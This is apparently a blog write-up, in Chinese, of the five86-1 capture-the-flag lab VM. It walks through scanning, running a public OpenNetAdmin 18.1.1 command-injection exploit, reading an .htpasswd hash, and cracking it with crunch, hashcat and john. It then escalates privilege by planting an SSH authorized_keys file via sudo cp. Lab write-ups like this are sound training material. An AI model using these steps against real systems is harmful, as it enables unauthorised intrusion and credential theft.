- 1python从云端数据库获取数据_用Python抓取亚马逊云(AWS)的日志(CloudTrail)数据...
- 2Python系列(13)—— 三元运算符_python3三元运算符
- 3ETH Denver 2024 精彩回顾|波卡,远不止一个区块链_波卡区块链
- 4mac上git clone报错:error: RPC failed; curl 92 HTTP/2 stream 0 was not closed cleanly: PROTOCOL_ERROR (e_mac error: rpc failed; result=92
- 5CVPR2023 | 形状感知零样本语义分割
- 6【Unity2D 2022:NPC】制作任务系统
- 7Mac下PHPStorm常用快捷键_mac phpstorm 快捷键
- 8【消息】GPT4有多强?_gtp4
- 9javax.xml.transform.Transformer单标签转多标签(空值默认单标签)
- 10Windows AD 域环镜 本地管理员密码解决方案(LAPS)部署_laps部署
five86-1靶机
赞
踩
five86-1靶机
环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式
一.明确目标
探测目标主机IP情况
nmap 192.168.107.0/24
- 1
目标主机IP:192.168.107.131
Kali的IP:192.168.107.132
二.信息搜集
Nmap 进行常规端口开放扫描
进行namp全端口服务枚举
nmap 192.168.107.131 -p- -A
- 1
可以看到目标靶机上开放的端口,22端口 ssh,80端口 http,以及10000/tcp open http MiniServ 1.920 (Webmin httpd)
对该网站目录进行爆破枚举,利用到的是kali上的dirb:
dirsearch -u 192.168.107.131
- 1
http://192.168.107.131/ona/
http://192.168.107.131/reports
http://192.168.107.131/robots.txt
分别访问其目录
http://192.168.107.131/ona/
百度查询一下opennetadmin
OpenNetAdmin 提供了一个数据库管理库存的IP网络.每个主机可以跟踪通过一个集中的AJAX的web界 面,可以帮助减少跟踪误差,并为您提供的一个工具.该项目OpenNetAdmin希望能提供一个有用的网络管理应用程序,用于管理您的IP子网和主机. 停止使用的电子表格来管理您的网络!
再查看一下版本信息,发现是18.1.1版本
http://192.168.107.131/reports
三.漏洞利用
在kali中搜索有无漏洞可以利用
searchsploit OpenNetAdmin 18.1.1
- 1
将其下载在kali上
searchsploit -m 47691.sh
- 1
命令注入脚本
直接使用命令注入脚本不好用,要用 dos2unix 47691.sh 命令将dos格式转换成unix格式
dos2unix 47691.sh
bash 47691.sh http://192.168.8.141/ona/
- 1
- 2
下面进行提权,但是这里不能执行的命令没有回显提示的,cd命令不可用,ls和cat命令可以用。
这里肯定是有权限控制的,可以使用find / -type f -user www-data命令查看这个用户可以读取的文件,除了/proc 就是/var/www/html/reports/.htaccess和/var/log/ona.log
find / -type f -user www-data
- 1
读取 var/www/html/reports/.htaccess 可以找到 AuthUserFile 的路径 /var/www/.htpasswd
读取这个文件如下,可以得到用户名 douglas 和HASH的密码 $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 ,给的提示是 只包含aefhrt的十个字符
尝试爆破密码
使用hash-identifier工具查找hash类型
hash-identifier
- 1
结果:hash -type : [+] MD5(APR)
生成字典
crunch 10 10 aefhrt -o password.txt
第一个10:最短长度
第二个10:最长长度
-o:输出为文件
- 1
- 2
- 3
- 4
- 5
- 6
爆破hash
方法一:这里使用哈希猫(hashcat)爆破,首先查找hash类型的编号
hashcat -h | grep APR
查找MD5(APR)的编号
- 1
- 2
hashcat -m 1600 -a 0 hash.txt zpassword.txt --force (zpassword.txt自己准备的字典)
-m 指定hash模式
-a 指定破解模式,0为用字典爆破
-o 结果输出到文件
--force 忽略警告信息
得到密码fatherrrrr
- 1
- 2
- 3
- 4
- 5
- 6
- 7
方法二:使用john破解
john --wordlist=password.txt hash.txt
字典模式,从单词表中或标准输入中读取hash.txt中的词汇
- 1
- 2
- 3
四.提权
得到的密码进行SSH登录(douglas:fatherrrrr)
find / --perm -4000 2>/dev/null
- 1
无结果,尝试sudo -l
发现可以用jen用户的身份执行/bin/cp,且无密码。
既然可以往jen家目录里拷贝文件 ,那就把douglas的ssh公钥拷到jen中,实现ssh免密登录。我们ls -a,发现了.ssh目录,进入找到了存放ssh公钥的文件id_rsa.pub
cp .ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
- 1
- 2
- 3
登录后发现jen收到了一封邮件,查看邮件
邮件中我们得到了用户moss以及密码Fire!Fire!
登录moss
查看moss家目录,发现了一个隐藏目录为.games,查看.games看到upyourgame的所属者和所属组有点意思,全是root,并且可执行
执行 upyourgame,一路yes
在root家目录中拿到flag
